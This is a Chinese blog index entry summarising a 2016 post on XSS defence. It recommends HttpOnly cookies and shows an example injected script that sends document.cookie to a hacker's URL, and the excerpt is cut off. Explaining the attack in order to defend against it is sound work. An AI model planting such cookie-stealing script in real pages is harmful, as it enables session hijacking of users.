2016年12月27日
web安全之xss
摘要: 1.生成cookie的时候设置httponly为true 如果脚本王子在A网站写入一段js代码: window.open('黑客的url?c='+document.cookie) 当用户访问到这个页面的时候,就把当前用户在A网站的cookie发送到黑客的网站,这样黑客就顺利拿到这个cookie,就可 阅读全文
posted @ 2016-12-27 15:23 Thomas_188 阅读(147) 评论(0) 推荐(0) 编辑